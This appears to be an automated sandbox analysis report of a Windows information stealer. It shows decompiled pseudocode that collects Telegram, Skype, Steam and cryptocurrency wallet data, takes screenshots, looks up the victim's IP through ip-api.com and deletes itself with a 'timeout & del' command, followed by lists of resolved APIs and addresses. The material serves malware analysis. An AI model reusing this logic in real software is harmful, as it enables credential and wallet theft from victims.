                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059A8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059BA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 004059CC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 004059DE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 004059F0
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 004059FF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(770A0000,EnumDisplayDevicesW), ref: 00405A14
                                                                                                                                                                                          • GetProcAddress.KERNEL32(770A0000,wvsprintfA), ref: 00405A29
                                                                                                                                                                                          • GetProcAddress.KERNEL32(770A0000,GetKeyboardLayoutList), ref: 00405A3E
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(shell32.dll,770A0000,GetKeyboardLayoutList,770A0000,wvsprintfA,770A0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A4D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(748E0000,ShellExecuteExW), ref: 00405A62
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(ntdll.dll,748E0000,ShellExecuteExW,shell32.dll,770A0000,GetKeyboardLayoutList,770A0000,wvsprintfA,770A0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405A71
                                                                                                                                                                                          • GetProcAddress.KERNEL32(77DF0000,RtlComputeCrc32), ref: 00405A86
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                          • String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetEnvironmentVariableW$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
                                                                                                                                                                                          • API String ID: 2238633743-617434850
                                                                                                                                                                                          • Opcode ID: ed6a8e92284a318c94f0322e28525f172068a9e89f8e16d42c814494dd58fb50
                                                                                                                                                                                          • Instruction ID: cfd24dbd3a5623e96a1366eeff91a6eabf16f5ed4c2f56b33555d19b2fe062a0
                                                                                                                                                                                          • Opcode Fuzzy Hash: ed6a8e92284a318c94f0322e28525f172068a9e89f8e16d42c814494dd58fb50
                                                                                                                                                                                          • Instruction Fuzzy Hash: AEC174B1A80710ABDB01EFA5DC8AA6A37A8FB45705360953BB544FF2D1D678DC018F9C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00419108, Relevance: 57.0, APIs: 4, Strings: 28, Instructions: 964synchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E00419108(char __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				void* _v56;
				char _v60;
				char _v64;
				signed int _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v88;
				char* _v92;
				char _v96;
				char _v100;
				char* _v104;
				void* _v108;
				char _v112;
				char _v241;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				char _v304;
				char _v308;
				char _v312;
				intOrPtr _v316;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				char _v336;
				char _v340;
				void* _v344;
				void* _v348;
				void* _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				char _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v448;
				char _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				char _v464;
				char _v468;
				char _v472;
				char _v476;
				char _v480;
				char _v484;
				char _v488;
				char _v492;
				char _v496;
				char _v500;
				char _v504;
				char _v508;
				char _v512;
				char _v516;
				char _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				intOrPtr _v604;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				void* _t446;
				void* _t452;
				intOrPtr* _t453;
				intOrPtr _t546;
				intOrPtr* _t616;
				intOrPtr* _t623;
				intOrPtr* _t630;
				intOrPtr* _t637;
				intOrPtr _t651;
				intOrPtr* _t654;
				intOrPtr* _t657;
				intOrPtr* _t660;
				intOrPtr* _t663;
				intOrPtr _t668;
				intOrPtr* _t671;
				void* _t677;
				intOrPtr* _t714;
				intOrPtr _t756;
				signed int _t806;
				intOrPtr* _t827;
				intOrPtr* _t830;
				signed int _t837;
				signed int _t884;
				intOrPtr _t907;
				int _t920;
				intOrPtr* _t932;
				void* _t954;
				signed int _t955;
				signed int _t956;
				void* _t957;
				void* _t975;
				intOrPtr _t983;
				intOrPtr _t1001;
				intOrPtr* _t1045;
				intOrPtr* _t1072;
				void* _t1094;
				void* _t1102;
				void* _t1132;
				void* _t1134;
				void* _t1135;
				signed int _t1137;
				intOrPtr _t1140;
				intOrPtr _t1141;
				void* _t1146;
				void* _t1167;
				void* _t1173;
				void* _t1181;
				void* _t1183;

				_t1183 = __fp0;
				_t1130 = __edi;
				_t1140 = _t1141;
				_t957 = 0x51;
				do {
					_push(0);
					_push(0);
					_t957 = _t957 - 1;
					_t1142 = _t957;
				} while (_t957 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v8 = __eax;
				E00403980(_v8);
				_push(_t1140);
				_push(0x41a13a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1141;
				E004034E4( &_v72);
				_v82 = 0;
				_v81 = 0;
				E0040357C( &_v88, 0x41a158);
				E0040561C();
				E00407D24( &_v308, _t1142);
				_push( &_v308);
				E00406C4C( &_v312, __ebx, __esi); // executed
				_pop(_t446);
				E00403798(_t446, _v312);
				_t452 = CreateMutexA(0, 0, E00403990(_v308)); // executed
				_v108 = _t452;
				_t453 =  *0x41b558; // 0x41c6a4
				if( *((intOrPtr*)( *_t453))() == 0xb7) {
					L68:
					_pop(_t983);
					 *[fs:eax] = _t983;
					_push(E0041A144);
					E004034E4( &_v652);
					E00403B98( &_v648, 2);
					E004034E4( &_v640);
					E00403B98( &_v636, 5);
					E00403508( &_v616, 0xa);
					E00403B80( &_v576);
					E00403508( &_v572, 2);
					E00403B80( &_v564);
					E00403508( &_v560, 2);
					E00403B80( &_v552);
					E00403508( &_v548, 2);
					E00403B80( &_v540);
					E00403508( &_v536, 2);
					E00403B80( &_v528);
					E00403508( &_v524, 2);
					E00403B80( &_v516);
					E00403508( &_v512, 2);
					E00403B80( &_v504);
					E00403508( &_v500, 2);
					E00403B80( &_v492);
					E00403508( &_v488, 0xa);
					E00403B98( &_v448, 2);
					E004034E4( &_v440);
					E00403B98( &_v436, 3);
					E004034E4( &_v424);
					E00403B98( &_v420, 2);
					E004034E4( &_v412);
					E00403B98( &_v408, 8);
					E004034E4( &_v376);
					E00403B98( &_v372, 4);
					E00403508( &_v356, 0xd);
					_t1001 =  *0x405f2c; // 0x405f30
					E00404224( &_v60, 5, _t1001);
					E00403508( &_v40, 7);
					E004034E4( &_v8);
					E004034E4( &_v112);
					E00403508( &_v104, 5);
					E00403508( &_v80, 3);
					return E004034E4( &_v64);
				} else {
					E004034E4( &_v112);
					_t954 = 0x44d;
					_t1137 = 0x41b0fc;
					while( *_t1137 != 0) {
						E004036CC();
						E00403798( &_v112, _v316);
						_t1137 = _t1137 + 1;
						_t954 = _t954 - 1;
						if(_t954 != 0) {
							continue;
						}
						break;
					}
					E00418F9C(_v112, _t954, _t957, _t1130, _t1137);
					E00406C4C( &_v324, _t954, _t1137); // executed
					E00406810(_v324, _t954, _t957,  &_v320, _t1130, _t1137);
					E004037DC( &_v32, _v320, _v88);
					E004176D8( &_v32, _t954, 0x80000, _v88, _t1130, _t1137);
					_t546 =  *0x41c8c0; // 0x0, executed
					E00418688(_t546, _t954, _v32, _t1130, _t1137,  &_v16); // executed
					E004176D8( &_v16, _t954, 0x80000, _v88, _t1130, _t1137);
					_t1146 = E00403790(_v16) - 0x2710;
					if(_t1146 < 0) {
						goto L68;
					}
					E004038DC(_v16, 0x41a164);
					if(_t1146 == 0) {
						goto L68;
					}
					E00407428(0x41a184, _t954, 0x41a174, _v16, _t1137,  &_v328);
					E00406984(_v328, _t954,  &_v36, _t1130, _t1137);
					E00407428(0x41a1a0, _t954, 0x41a190, _v16, _t1137,  &_v332);
					E00406AE4(_v332, _t954,  &_v40, _t1130, _t1137);
					E0040795C(0x41a1ac,  &_v44, _v36, _t1146);
					_t968 = 0x41a1b8;
					E00407428(0x41a1c8, _t954, 0x41a1b8, _v16, _t1137,  &_v340);
					_t1017 =  &_v336;
					E00406984(_v340, _t954,  &_v336, _t1130, _t1137);
					E004080C4(_v336, _t1146);
					E00408328(_v40, _t954,  &_v336, _t1130, _t1137);
					E0040DC44();
					_t1132 = E004045EC(_v44) - 1;
					if(_t1132 < 0) {
						L48:
						_push(_v8);
						_push(0x41a1ac);
						E00417290( &_v464, _t954, _t1017, _t1132, _t1137);
						_push(_v464);
						E00403850();
						E0040DCE8(_v460, _t954, "System.txt", _t1132, _t1137);
						E00406C4C( &_v472, _t954, _t1137);
						E00406810(_v472, _t954, _t968,  &_v468, _t1132, _t1137);
						_push(_v468);
						_push(0x41a3e8);
						E00407A4C( &_v480, _t954, _t1132, _t1137);
						E00406810(_v480, _t954, _t968,  &_v476, _t1132, _t1137);
						_push(_v476);
						_push(0x41a3e8);
						E00406BB4( &_v492);
						E0040377C( &_v488, _v492);
						E00406810(_v488, _t954, _t968,  &_v484, _t1132, _t1137);
						_push(_v484);
						_push(0x41a3e8);
						E004066C0( &_v504, _t1168);
						E0040377C( &_v500, _v504);
						E00406810(_v500, _t954, _t968,  &_v496, _t1132, _t1137);
						_push(_v496);
						_push(0x41a3e8);
						E00406610( &_v516);
						E0040377C( &_v512, _v516);
						E00406810(_v512, _t954, _t968,  &_v508, _t1132, _t1137);
						_push(_v508);
						_push(0x41a3e8);
						E004065CC( &_v528);
						E0040377C( &_v524, _v528);
						E00406810(_v524, _t954, _t968,  &_v520, _t1132, _t1137);
						_push(_v520);
						_push(0x41a3e8);
						_t616 =  *0x41b5b8; // 0x41b0b8
						E00406FDC( *_t616, _t954,  &_v540, _t1137, _t1168);
						E0040377C( &_v536, _v540);
						E00406810(_v536, _t954, _t968,  &_v532, _t1132, _t1137);
						_push(_v532);
						_push(0x41a3e8);
						_t623 =  *0x41b5c4; // 0x41b0b0
						E00406FDC( *_t623, _t954,  &_v552, _t1137, _t1168);
						E0040377C( &_v548, _v552);
						E00406810(_v548, _t954, _t968,  &_v544, _t1132, _t1137);
						_push(_v544);
						_push(0x41a3e8);
						_t630 =  *0x41b584; // 0x41b0b4
						E00406FDC( *_t630, _t954,  &_v564, _t1137, _t1168);
						E0040377C( &_v560, _v564);
						E00406810(_v560, _t954, _t968,  &_v556, _t1132, _t1137);
						_push(_v556);
						_push(0x41a3e8);
						_t637 =  *0x41b638; // 0x41b0ac
						E00406FDC( *_t637, _t954,  &_v576, _t1137, _t1168);
						E0040377C( &_v572, _v576);
						E00406810(_v572, _t954, _t968,  &_v568, _t1132, _t1137);
						_push(_v568);
						_push(0x41a3e8);
						E00406810(_v8, _t954, _t968,  &_v580, _t1132, _t1137);
						_push(_v580);
						_push(0x41a3e8);
						E00407D24( &_v588, _t1168);
						E00406810(_v588, _t954, _t968,  &_v584, _t1132, _t1137);
						_push(_v584);
						E00403850();
						_t651 =  *0x41b5f4; // 0x41b0bc
						_t1045 =  *0x41b5f4; // 0x41b0bc
						E00403798(_t651,  *_t1045);
						_push(_v24);
						_t654 =  *0x41b5f4; // 0x41b0bc
						_push( *_t654);
						E004063A4( &_v592, _t954, _t1132, _t1137);
						_push(_v592);
						_t657 =  *0x41b5f4; // 0x41b0bc
						_push( *_t657);
						E0040653C( &_v596, _t954, _t968, _t1132, _t1137);
						_push(_v596);
						_t660 =  *0x41b5f4; // 0x41b0bc
						_push( *_t660);
						E0040DEE4( &_v600, _t954, _t1168);
						_push(_v600);
						_t663 =  *0x41b5f4; // 0x41b0bc
						_push( *_t663);
						E00403850();
						_t1169 = _v81 - 1;
						if(_v81 == 1) {
							_push(_v76);
							_push(0x41a3b8);
							_push(_v80);
							E00403850();
							E00403798( &_v20, _v604);
						}
						E004176D8( &_v20, _t954, 0x80000, _v88, _t1132, _t1137);
						_t970 = 0;
						_t668 =  *0x41c8c0; // 0x0
						E00418688(_t668, _t954, _v20, _t1132, _t1137,  &_v608);
						_t671 =  *0x41b60c; // 0x41c6a0
						 *((intOrPtr*)( *_t671))(_v108);
						E004050C8(0x41a3f4, _t954, _t1132, _t1137, _t1169);
						_t677 = E00403790(_v72);
						_t1170 = _t677 - 3;
						if(_t677 <= 3) {
							L62:
							E004087DC(_t954, _t1137);
							E00407D24( &_v616, _t1181);
							E004038DC(_v616, 0x41a424);
							if(_t1181 != 0) {
								L65:
								E004038DC(_v8, 0x41a430);
								if(__eflags == 0) {
									__eflags = _v82 - 1;
									if(_v82 == 1) {
										E004028E0( &_v304, 0x3c);
										_v304 = 0x3c;
										_v300 = 0x1c0;
										_v296 = 0;
										_v292 = 0;
										E004062D8(L"%comspec%",  &_v620, __eflags);
										_v288 = E00403D3C(_v620);
										E004062D8(L"/c %WINDIR%\\system32\\timeout.exe 3 & del \"",  &_v628, __eflags);
										E00402754(0,  &_v640);
										E00403D2C( &_v636, _v640);
										E0040770C(_v636, _t954, 0,  &_v632, _t1137, __eflags);
										E00403E1C();
										_v284 = E00403D3C(_v624);
										E00402754(0,  &_v652);
										E00403D2C( &_v648, _v652);
										E00407798(_v648, _t954, 0,  &_v644, _t1137, __eflags);
										_v280 = E00403D3C(_v644);
										__eflags = 0;
										_v276 = 0;
										_t714 =  *0x41b564; // 0x41c768
										 *((intOrPtr*)( *_t714))( &_v304, E0041A4AC, _v632, _v628);
										ExitProcess(0);
									}
								}
								goto L68;
							}
							E004038DC(_v8, 0x41a430);
							if(_t1181 != 0) {
								goto L65;
							}
							E00407DD4(_t954, _t970, _t1132, _t1137, _t1181);
							goto L68;
						} else {
							_t970 =  &_v52;
							E0040795C(0x41a1ac,  &_v52, _v72, _t1170);
							_t1132 = E004045EC(_v52) - 1;
							if(_t1132 < 0) {
								goto L62;
							}
							_t1134 = _t1132 + 1;
							_t955 = 0;
							do {
								_push(0);
								E004047A8();
								_t1141 = _t1141 + 4;
								_t970 =  &_v56;
								E0040795C(0x41a2dc,  &_v56,  *((intOrPtr*)(_v52 + _t955 * 4)), 0);
								_t1173 = E004045EC(_v56) - 4;
								if(_t1173 != 0) {
									goto L61;
								}
								E004038DC( *_v56, 0x41a400);
								if(_t1173 != 0) {
									goto L61;
								}
								_t970 =  &_v60;
								E0040795C(0x41a40c,  &_v60,  *((intOrPtr*)(_v56 + 0xc)), _t1173);
								_v83 = 0;
								_t1137 = E004045EC(_v60) - 1;
								if(_t1137 < 0) {
									L59:
									_t1179 = _v83 - 1;
									if(_v83 == 1) {
										E004038DC( *((intOrPtr*)(_v56 + 8)), 0x41a418);
										E00418CF4( *((intOrPtr*)(_v56 + 4)), _t955, 0x41a400 | _t1179 == 0x00000000, _t1134, _t1137);
									}
									goto L61;
								}
								_t1137 = _t1137 + 1;
								_v68 = 0;
								while(1) {
									E00406318( *((intOrPtr*)(_v60 + _v68 * 4)), _t955,  &_v612, _t1134, _t1137);
									_t1072 =  *0x41b568; // 0x41c66c
									_v83 = E00403A78(_v612,  *_t1072) != 0;
									if(_v83 == 1) {
										goto L59;
									}
									_v68 = _v68 + 1;
									_t1137 = _t1137 - 1;
									if(_t1137 != 0) {
										continue;
									}
									goto L59;
								}
								goto L59;
								L61:
								_t955 = _t955 + 1;
								_t1134 = _t1134 - 1;
								_t1181 = _t1134;
							} while (_t1181 != 0);
							goto L62;
						}
					} else {
						_t1135 = _t1132 + 1;
						_t956 = 0;
						do {
							if(E00403790( *((intOrPtr*)(_v44 + _t956 * 4))) < 5) {
								goto L47;
							}
							if(_t956 == 0) {
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 9)) == 0x2b) {
									E00414098();
								}
								_t907 =  *((intOrPtr*)(_v44 + _t956 * 4));
								_t1154 =  *((char*)(_t907 + 3)) - 0x2b;
								if( *((char*)(_t907 + 3)) == 0x2b) {
									E00415EA8(L"Coins", _t956, _t968, _t1017, _t1135, _t1137, _t1154);
									_t932 =  *0x41b5c4; // 0x41b0b0
									_t1155 =  *_t932;
									if( *_t932 > 0) {
										E004050C8(0x41a200, _t956, _t1135, _t1137, _t1155);
									}
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 4)) == 0x2b) {
									E00414CB8(L"Skype", _t956, _t1135, _t1137);
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 5)) == 0x2b) {
									_t968 = L"Telegram";
									_t1017 = L"D877F783D5*,map*";
									E00414408(L"%appdata%\\Telegram Desktop\\tdata\\", _t956, L"Telegram", L"D877F783D5*,map*", _t1135, _t1137, 0, 0, 1, 0x3e8, 0);
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 6)) == 0x2b) {
									E00414F40(L"Steam", _t956, _t1135, _t1137);
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 7)) == 0x2b) {
									_push(0);
									_push(0x32);
									_push(L"image/jpeg");
									_push( &_v64);
									_push(GetSystemMetrics(1));
									_t920 = GetSystemMetrics(0);
									_t968 = 0;
									_pop(_t1094);
									E004178B4(_t920, _t956, 0, _t1094, _t1135, _t1137);
									_t1017 = "scr.jpg";
									E0040DCE8(_v64, _t956, "scr.jpg", _t1135, _t1137);
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 8)) == 0x2b) {
									_v82 = 1;
								}
							}
							_t756 = _v44;
							_t1162 =  *((char*)( *((intOrPtr*)(_t756 + _t956 * 4)))) - 0x46;
							if( *((char*)( *((intOrPtr*)(_t756 + _t956 * 4)))) != 0x46) {
								L41:
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)))) == 0x4c) {
									_push(_v72);
									_push( *((intOrPtr*)(_v44 + _t956 * 4)));
									_push(0x41a1ac);
									_t1017 = 3;
									E00403850();
								}
								_t1167 =  *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)))) - 0x49;
								if(_t1167 == 0) {
									_t968 =  &_v48;
									E0040795C(0x41a2dc,  &_v48,  *((intOrPtr*)(_v44 + _t956 * 4)), _t1167);
									E004038DC( *((intOrPtr*)(_v48 + 4)), 0x41a348);
									if(_t1167 != 0) {
										_t1017 = "ip.txt";
										E0040DCE8( *((intOrPtr*)(_v48 + 4)), _t956, "ip.txt", _t1135, _t1137);
									} else {
										_v81 = 1;
										E00418688("http://ip-api.com/json", _t956, 0, _t1135, _t1137,  &_v28);
										E00407428("\"query\":\"", _t956, 0x41a380, _v28, _t1137,  &_v76);
										_t968 = 0x41a380;
										E00407428("\"countryCode\":\"", _t956, 0x41a380, _v28, _t1137,  &_v80);
										_push(_v76);
										_push(0x41a3b8);
										_push(_v80);
										E00403850();
										_t1017 = "ip.txt";
										E0040DCE8(_v456, _t956, "ip.txt", _t1135, _t1137);
									}
								}
							} else {
								E0040795C(0x41a2dc,  &_v48,  *((intOrPtr*)(_v44 + _t956 * 4)), _t1162);
								E0040357C( &_v92,  *((intOrPtr*)(_v48 + 8)));
								if(E00403A78(0x41a2e8, _v92) != 1) {
									E00403D2C( &_v428,  *((intOrPtr*)(_v48 + 0x1c)));
									_push(_v428);
									E00403D2C( &_v432,  *((intOrPtr*)(_v48 + 0x10)));
									_push(E00407048(_v432, _t956,  &_v48, __eflags));
									_push(E004038DC( *((intOrPtr*)(_v48 + 0x14)), 0x41a32c) & 0xffffff00 | __eflags == 0x00000000);
									_t806 = E004038DC( *((intOrPtr*)(_v48 + 0x18)), 0x41a32c);
									_t193 = __eflags == 0;
									__eflags = _t193;
									_push(_t806 & 0xffffff00 | _t193);
									_push(1);
									_push("Files\\");
									_push( *((intOrPtr*)(_v48 + 4)));
									_push(0x41a310);
									E00403850();
									E00403D2C( &_v436, _v440);
									_push(_v436);
									E00403D2C( &_v444,  *((intOrPtr*)(_v48 + 0xc)));
									_push(_v444);
									E004037DC( &_v452, 0x41a310,  *((intOrPtr*)(_v48 + 8)));
									E00403D2C( &_v448, _v452);
									_pop(_t1017);
									_pop(_t968);
									E00414408(_v448, _t956, _t968, _t1017, _t1135, _t1137);
									goto L41;
								}
								_t968 = 0x41a2f8;
								_t1017 = _v92;
								E00407428(0x41a2e8, _t956, 0x41a2f8, _v92, _t1137,  &_v104);
								_push( &_v241);
								_push(0x81);
								_t827 =  *0x41b59c; // 0x41c6fc
								if( *((intOrPtr*)( *_t827))() == 0) {
									goto L68;
								}
								_t1137 =  &_v241;
								while( *_t1137 != 0) {
									_t830 =  *0x41b54c; // 0x41c700
									E00406FDC( *((intOrPtr*)( *_t830))(_t1137), _t956,  &_v360, _t1137, __eflags);
									E0040377C( &_v356, _v360);
									_t1017 = _v104;
									_t837 = E00403A78(_v356, _v104);
									__eflags = _t837;
									if(_t837 != 0) {
										_push( &_v364);
										E00403C98( &_v368, _t1137);
										_push(_v368);
										_push("%DSK_");
										_push(_v104);
										E00403850();
										E00403D2C( &_v372, _v376);
										_push(_v372);
										E00403D2C( &_v380, _v92);
										_pop(_t1102);
										_t975 = 0x41a304;
										E004070BC(_v380, _t956, _t975, _t1102);
										E0040377C( &_v100, _v364);
										E004034E4( &_v96);
										_push( *((intOrPtr*)(_v48 + 4)));
										_push(0x41a310);
										_push(_v100);
										E00403850();
										E00403D2C( &_v388, _v96);
										E004070BC(_v388, _t956, 0, 0x41a318,  &_v384);
										E00403D58( &_v384, 0, 0x41a320, __eflags);
										E0040377C( &_v96, _v384);
										E00403D2C( &_v396, _v96);
										E0040781C(_v396, _t956,  &_v392, __eflags);
										E0040377C( &_v96, _v392);
										E00403D2C( &_v400,  *((intOrPtr*)(_v48 + 0x1c)));
										_push(_v400);
										E00403D2C( &_v404,  *((intOrPtr*)(_v48 + 0x10)));
										_push(E00407048(_v404, _t956, 0, __eflags));
										_push(E004038DC( *((intOrPtr*)(_v48 + 0x14)), 0x41a32c) & 0xffffff00 | __eflags == 0x00000000);
										_t884 = E004038DC( *((intOrPtr*)(_v48 + 0x18)), 0x41a32c);
										_t163 = __eflags == 0;
										__eflags = _t163;
										_push(_t884 & 0xffffff00 | _t163);
										_push(1);
										E004037DC( &_v412, _v96, "Files\\");
										E00403D2C( &_v408, _v412);
										_push(_v408);
										E00403D2C( &_v416,  *((intOrPtr*)(_v48 + 0xc)));
										_push(_v416);
										E004037DC( &_v424, 0x41a310, _v100);
										E00403D2C( &_v420, _v424);
										_pop(_t1017);
										_pop(_t968);
										E00414408(_v420, _t956, _t968, _t1017, _t1135, _t1137);
									}
									_t1137 = _t1137 + 4;
									__eflags = _t1137;
								}
								goto L41;
							}
							L47:
							_t956 = _t956 + 1;
							_t1135 = _t1135 - 1;
							_t1168 = _t1135;
						} while (_t1135 != 0);
						goto L48;
					}
				}
			}















































































































































































                                                                                                                                                                                          0x00419108
                                                                                                                                                                                          0x00419108
                                                                                                                                                                                          0x00419109
                                                                                                                                                                                          0x0041910b
                                                                                                                                                                                          0x00419110
                                                                                                                                                                                          0x00419110
                                                                                                                                                                                          0x00419112
                                                                                                                                                                                          0x00419114
                                                                                                                                                                                          0x00419114
                                                                                                                                                                                          0x00419114
                                                                                                                                                                                          0x00419117
                                                                                                                                                                                          0x00419118
                                                                                                                                                                                          0x00419119
                                                                                                                                                                                          0x0041911a
                                                                                                                                                                                          0x00419120
                                                                                                                                                                                          0x00419127
                                                                                                                                                                                          0x00419128
                                                                                                                                                                                          0x0041912d
                                                                                                                                                                                          0x00419130
                                                                                                                                                                                          0x00419136
                                                                                                                                                                                          0x0041913b
                                                                                                                                                                                          0x0041913f
                                                                                                                                                                                          0x0041914b
                                                                                                                                                                                          0x00419150
                                                                                                                                                                                          0x0041915b
                                                                                                                                                                                          0x00419166
                                                                                                                                                                                          0x0041916d
                                                                                                                                                                                          0x00419178
                                                                                                                                                                                          0x00419179
                                                                                                                                                                                          0x00419195
                                                                                                                                                                                          0x00419197
                                                                                                                                                                                          0x0041919a
                                                                                                                                                                                          0x004191a8
                                                                                                                                                                                          0x00419f30
                                                                                                                                                                                          0x00419f32
                                                                                                                                                                                          0x00419f35
                                                                                                                                                                                          0x00419f38
                                                                                                                                                                                          0x00419f43
                                                                                                                                                                                          0x00419f53
                                                                                                                                                                                          0x00419f5e
                                                                                                                                                                                          0x00419f6e
                                                                                                                                                                                          0x00419f7e
                                                                                                                                                                                          0x00419f89
                                                                                                                                                                                          0x00419f99
                                                                                                                                                                                          0x00419fa4
                                                                                                                                                                                          0x00419fb4
                                                                                                                                                                                          0x00419fbf
                                                                                                                                                                                          0x00419fcf
                                                                                                                                                                                          0x00419fda
                                                                                                                                                                                          0x00419fea
                                                                                                                                                                                          0x00419ff5
                                                                                                                                                                                          0x0041a005
                                                                                                                                                                                          0x0041a010
                                                                                                                                                                                          0x0041a020
                                                                                                                                                                                          0x0041a02b
                                                                                                                                                                                          0x0041a03b
                                                                                                                                                                                          0x0041a046
                                                                                                                                                                                          0x0041a056
                                                                                                                                                                                          0x0041a066
                                                                                                                                                                                          0x0041a071
                                                                                                                                                                                          0x0041a081
                                                                                                                                                                                          0x0041a08c
                                                                                                                                                                                          0x0041a09c
                                                                                                                                                                                          0x0041a0a7
                                                                                                                                                                                          0x0041a0b7
                                                                                                                                                                                          0x0041a0c2
                                                                                                                                                                                          0x0041a0d2
                                                                                                                                                                                          0x0041a0e2
                                                                                                                                                                                          0x0041a0ea
                                                                                                                                                                                          0x0041a0f5
                                                                                                                                                                                          0x0041a102
                                                                                                                                                                                          0x0041a10a
                                                                                                                                                                                          0x0041a112
                                                                                                                                                                                          0x0041a11f
                                                                                                                                                                                          0x0041a12c
                                                                                                                                                                                          0x0041a139
                                                                                                                                                                                          0x004191ae
                                                                                                                                                                                          0x004191b1
                                                                                                                                                                                          0x004191b6
                                                                                                                                                                                          0x004191bb
                                                                                                                                                                                          0x004191c0
                                                                                                                                                                                          0x004191cd
                                                                                                                                                                                          0x004191db
                                                                                                                                                                                          0x004191e0
                                                                                                                                                                                          0x004191e1
                                                                                                                                                                                          0x004191e2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004191e2
                                                                                                                                                                                          0x004191e7
                                                                                                                                                                                          0x004191f2
                                                                                                                                                                                          0x00419203
                                                                                                                                                                                          0x00419214
                                                                                                                                                                                          0x00419224
                                                                                                                                                                                          0x00419232
                                                                                                                                                                                          0x00419237
                                                                                                                                                                                          0x00419247
                                                                                                                                                                                          0x00419254
                                                                                                                                                                                          0x00419259
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419267
                                                                                                                                                                                          0x0041926c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00419286
                                                                                                                                                                                          0x00419294
                                                                                                                                                                                          0x004192ad
                                                                                                                                                                                          0x004192bb
                                                                                                                                                                                          0x004192cb
                                                                                                                                                                                          0x004192d7
                                                                                                                                                                                          0x004192e4
                                                                                                                                                                                          0x004192ef
